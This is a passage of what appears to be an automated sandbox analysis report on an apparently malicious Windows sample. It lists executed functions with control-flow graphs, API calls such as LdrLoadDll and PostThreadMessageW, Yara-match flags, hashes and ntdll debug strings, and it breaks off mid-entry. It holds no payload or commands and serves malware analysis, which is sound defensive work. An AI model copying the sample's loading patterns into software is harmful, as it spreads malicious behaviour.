42bc13 ExitProcess 95350->95351 95350->95352 95351->95352 95352->95320 95354 4145f2 95353->95354 95355 414747 95354->95355 95358 414710 95354->95358 95362 414023 LdrInitializeThunk 95354->95362 95355->95348 95357 414724 95357->95355 95364 41b563 NtClose RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 95357->95364 95358->95355 95363 41b563 NtClose RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 95358->95363 95360 41473d 95360->95348 95362->95358 95363->95357 95364->95360

                      Executed Functions

                      Function 00417E63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 47 417e63-417e7f 48 417e87-417e8c 47->48 49 417e82 call 42e433 47->49 50 417e92-417ea0 call 42e953 48->50 51 417e8e-417e91 48->51 49->48 54 417eb0-417ec1 call 42cdf3 50->54 55 417ea2-417ead call 42ebf3 50->55 60 417ec3-417ed7 LdrLoadDll 54->60 61 417eda-417edd 54->61 55->54 60->61
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417ED5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 942a60e6e87afde0c01754d0e8ffe965a11c5306625b664f60415aee2c061237
                      • Instruction ID: 340cd77e7f87dfa89d018dfb1f2acdb4e72a74200cd8835b87e0ddb3e548f1e3
                      • Opcode Fuzzy Hash: 942a60e6e87afde0c01754d0e8ffe965a11c5306625b664f60415aee2c061237
                      • Instruction Fuzzy Hash: A80121B5E0020DABDF10DBE5DC42FDEB7B8AB54308F0081AAE90897241F675EB548B95
                      Function 0042B863 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 91 42b863-42b89f call 404a33 call 42c903 NtClose
                      APIs
                      • NtClose.NTDLL(004246E4,?,00009E5D,E5B4FE69,?,004246E4,E5B4FE69,?,?,?,?,?,?,?,?,00000000), ref: 0042B89A
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction ID: 4f7b613b055f9903099ff79a2a274ef894adb1f56720fc5d56049f23c7b0790b
                      • Opcode Fuzzy Hash: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction Fuzzy Hash: 6DE086713446147BD620EA5ADC41F9BB76CEFC5715F004419FA0D67242CA71B9118BF4
                      Function 01772B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 105 1772b60-1772b6c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
                      • Instruction ID: 2c70833671dfb32b01ea2dfc702273ee7d3842cf8d6637c7090005d255ad0981
                      • Opcode Fuzzy Hash: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
                      • Instruction Fuzzy Hash: 3690026124640003420571584454616D00B97E0311B95C031E10145A4DC5258A916227
                      Function 01772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 107 1772df0-1772dfc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
                      • Instruction ID: 82cb42a798e53888c0339abc77963482317e4098285361a47779c40605a01015
                      • Opcode Fuzzy Hash: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
                      • Instruction Fuzzy Hash: 0790023124540413D21171584544707900A97D0351FD5C422A042456CDD6568B52A223
                      Function 01772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 106 1772c70-1772c7c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
                      • Instruction ID: fabb5ec443e4d2e96ba3d2c2f1dc189f7c6b497415f299f06ccb8b611d5b8580
                      • Opcode Fuzzy Hash: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
                      • Instruction Fuzzy Hash: 7490023124548802D2107158844474A900697D0311F99C421A442466CDC6958A917223
                      Function 017735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 108 17735c0-17735cc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
                      • Instruction ID: 5a6a5f4da644db9e3a020c544c58c31cb8f4e9c20a8af636046f37b102092ec6
                      • Opcode Fuzzy Hash: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
                      • Instruction Fuzzy Hash: 8E90023164950402D20071584554706A00697D0311FA5C421A042457CDC7958B5166A3
                      Function 004143DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                      Download Yara Rule

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3y36225$3y36225
                      • API String ID: 0-273086695
                      • Opcode ID: 42849a82cb2a5875040db00419b8bb6000032622cdf452db38a7084606a29a10
                      • Instruction ID: d6a87481034046504259ab9475783a26c62be36130ed312dd88092d7cf387377
                      • Opcode Fuzzy Hash: 42849a82cb2a5875040db00419b8bb6000032622cdf452db38a7084606a29a10
                      • Instruction Fuzzy Hash: 4931ABB090524D7AE7119AB5CC82DEF7F7CDF81354F08819BF550AB241D2384A46CBA6
                      Function 004144A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • PostThreadMessageW.USER32(3y36225,00000111,00000000,00000000), ref: 0041451A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID: 3y36225$3y36225
                      • API String ID: 1836367815-273086695
                      • Opcode ID: d67075a2a7b78c628de292b0a38a5500c080fd8593d1b81f3bc69bacdda97771
                      • Instruction ID: cf2e8b15c8286ec2bedcd5a5aaf459a0c44da7379a147a5a3df17a3edcbcf48b
                      • Opcode Fuzzy Hash: d67075a2a7b78c628de292b0a38a5500c080fd8593d1b81f3bc69bacdda97771
                      • Instruction Fuzzy Hash: 2301DBB1D4021C7ADB10AAE19C81DEF7B7CDF40398F44406AFA0467141D67C4F068BA5
                      Function 00417E56 Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 62 417e56-417e59 63 417e72-417e8c call 42e433 62->63 64 417e5b 62->64 71 417e92-417ea0 call 42e953 63->71 72 417e8e-417e91 63->72 65 417e5d-417e60 64->65 66 417ebe-417ec1 64->66 65->63 69 417ec3-417ed7 LdrLoadDll 66->69 70 417eda-417edd 66->70 69->70 75 417eb0-417ec1 call 42cdf3 71->75 76 417ea2-417ead call 42ebf3 71->76 75->69 75->70 76->75
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417ED5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 06016602d0770ca522341d27ffd274018231073a67a5a0f8347fd14216fd37da
                      • Instruction ID: 8410c6a1e857e367f5e62e787350f2e137c32ab851fc57385a1af37c87286ca9
                      • Opcode Fuzzy Hash: 06016602d0770ca522341d27ffd274018231073a67a5a0f8347fd14216fd37da
                      • Instruction Fuzzy Hash: C7F08971A4420D9BDB10DA90D841BDEF3F8DF54718F1082DAED1897240F274AE848B94
                      Function 0042BB73 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 81 42bb73-42bbb7 call 404a33 call 42c903 RtlAllocateHeap
                      APIs
                      • RtlAllocateHeap.NTDLL(00000104,E5B4FE69,004246EF,E5B4FE69,?,004246EF,E5B4FE69,00000104,E5B4FE69), ref: 0042BBB2
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction ID: 30321ae17118031ce98652e6a0e234e6d43cb8b6ead947814470870dfaa11c10
                      • Opcode Fuzzy Hash: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction Fuzzy Hash: 03E012B12047147BD614EF99EC41F9B77ADEFC5711F00441AFA18A7242D671B910CBB9
                      Function 0042BBC3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 86 42bbc3-42bc04 call 404a33 call 42c903 RtlFreeHeap
                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,0041773D,000000F4,?,?,?,?,?), ref: 0042BBFF
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 7b89a264751e4e95cb903b6f32873bd17e7dfa8da40c9c63da6e5e9cc1a879b7
                      • Instruction ID: 2da9d0e7a21640b15972741b79d265a39dd7ec6f31430385fe6f3fcdc5577bf1
                      • Opcode Fuzzy Hash: 7b89a264751e4e95cb903b6f32873bd17e7dfa8da40c9c63da6e5e9cc1a879b7
                      • Instruction Fuzzy Hash: E3E06DB13042087BD610EE99DC41FAB73ADEFC5710F000419F908A7241D770B9108BB8
                      Function 0042BC13 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 96 42bc13-42bc4c call 404a33 call 42c903 ExitProcess
                      APIs
                      • ExitProcess.KERNEL32(?,00000000,?,?,ED83A847,?,?,ED83A847), ref: 0042BC47
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: b1611f0706da03560bc2927904e7df383ec382c809dc77d81f69449adc1a638e
                      • Instruction ID: 5f97de785f459c03f24def2a91649a2dbaaa58a9f506482041b429eca52fc512
                      • Opcode Fuzzy Hash: b1611f0706da03560bc2927904e7df383ec382c809dc77d81f69449adc1a638e
                      • Instruction Fuzzy Hash: F0E046762042147BD620EA9AEC42F9BB76CDFC5764F00401AFA08A7242D6B1BA0087E4
                      Function 01772C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 101 1772c0a-1772c0f 102 1772c11-1772c18 101->102 103 1772c1f-1772c26 LdrInitializeThunk 101->103
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                      • Instruction ID: 7fe65e61980c790fdd4b1a34f6346f066874f608441069daf3ea2630a6eb2d2c
                      • Opcode Fuzzy Hash: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                      • Instruction Fuzzy Hash: D3B04C719455C585DB11A7644608616B9056790711F55C461D2120655B47288191E276

                      Non-executed Functions

                      Function 017B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-2160512332
                      • Opcode ID: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
                      • Instruction ID: 99df3b53211d3110d2a0f49f17bfdf4674f7031a13b9f40ef0d4e118e72fe0a1
                      • Opcode Fuzzy Hash: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
                      • Instruction Fuzzy Hash: 37928F71609742AFE721DF28C884BABF7E8BB88754F04492DFA94D7252D770E844CB52
                      Function 01768620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                      Download Yara Rule
                      Strings
                      • Invalid debug info address of this critical section, xrefs: 017A54B6
                      • Thread identifier, xrefs: 017A553A
                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
                      • Critical section address., xrefs: 017A5502
                      • Critical section debug info address, xrefs: 017A541F, 017A552E
                      • corrupted critical section, xrefs: 017A54C2
                      • Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
                      • Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
                      • 8, xrefs: 017A52E3
                      • double initialized or corrupted critical section, xrefs: 017A5508
                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
                      • Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
                      • undeleted critical section in freed memory, xrefs: 017A542B
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                      • API String ID: 0-2368682639
                      • Opcode ID: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
                      • Instruction ID: f32b1a927204cf677fd89d60692bda691fb6cd9bf609df1d862a57d6ade333b3
                      • Opcode Fuzzy Hash: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
                      • Instruction Fuzzy Hash: 9681BDB0A40358EFDB20CF99C895BAEFBB9FB48B04F644259F904B7241D375A941CB61
                      Function 017629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                      Download Yara Rule
                      Strings
                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
                      • @, xrefs: 017A259B
                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                      • API String ID: 0-4009184096
                      • Opcode ID: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
                      • Instruction ID: 2ad09adaf471c9177c6007789209febafa29952d00ab99ef055ce9a0a7b660b3
                      • Opcode Fuzzy Hash: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
                      • Instruction Fuzzy Hash: 580260F1D042299FDB61DB58CC84BD9F7B8AF54704F4041EAEA09A7246EB309E84CF59
                      Function 017D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                      • API String ID: 0-2515994595
                      • Opcode ID: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
                      • Instruction ID: 0d18d2d492c18af44e0c4f2dfe6155ea2fdfaae2242e02b77eb54663a6e16dce
                      • Opcode Fuzzy Hash: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
                      • Instruction Fuzzy Hash: F751B1B15043499BD72ACF188848BABFBFCEF98240F14496DE999C3285E770D644C7A3
                      Function 017E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                      • API String ID: 0-1700792311
                      • Opcode ID: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
                      • Instruction ID: e39d6498ded979dd95c65608d5cb0a959879735f34ad87a27d4144fb6c2c5f82
                      • Opcode Fuzzy Hash: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
                      • Instruction Fuzzy Hash: 58D1CD71604686DFDB22DFA8C458AADFBF1FF5A710F188059F8859B252C7B49942CF20
                      Function 017B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                      Download Yara Rule
                      Strings
                      • VerifierFlags, xrefs: 017B8C50
                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
                      • AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
                      • VerifierDlls, xrefs: 017B8CBD
                      • VerifierDebug, xrefs: 017B8CA5
                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
                      • HandleTraces, xrefs: 017B8C8F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                      • API String ID: 0-3223716464
                      • Opcode ID: fb78b65cf1f9506f30299967dd693979767afd334342d2d014224e03d77dacff
                      • Instruction ID: 10a4b55e2e1db1d08582ee9805034e28485ca7f8c4b41ae67e9f1755c32801e1
                      • Opcode Fuzzy Hash: fb78b65cf1f9506f30299967dd693979767afd334342d2d014224e03d77dacff
                      • Instruction Fuzzy Hash: 7C9126B1645312AFD722DF28C8D4BEBF7A8EB54B14F444499FA45AB284C7309E40CB96
                      Function 017663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-792281065
                      • Opcode ID: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
                      • Instruction ID: 8910bd41c6e0460e0325ea7e6f139ab24d685e7df5e0910dd1847fc6e4ddad1e
                      • Opcode Fuzzy Hash: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
                      • Instruction Fuzzy Hash: A6916970B003159BDB36DF18D858BAAFBA5FB80B14F944228FE02672C5D7B59A01CB90
                      Function 0172645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                      Download Yara Rule
                      Strings
                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
                      • LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30
                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01789A01
                      • minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01789A2A
                      • apphelp.dll, xrefs: 01726496
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-204845295
                      • Opcode ID: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
                      • Instruction ID: aaded4cd8ebf95b62906e12fcb1336a6a7226f7f3a9f360181f9126fa65daa63
                      • Opcode Fuzzy Hash: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
                      • Instruction Fuzzy Hash: 8F51C1712583049FD721EF28C895BABF7E4FB84648F10492EFA8597155E730EA05CB93
                      Function 01762674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                      Download Yara Rule
                      Strings
                      • RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178
                      • SXS: %s() passed the empty activation context, xrefs: 017A2165
                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
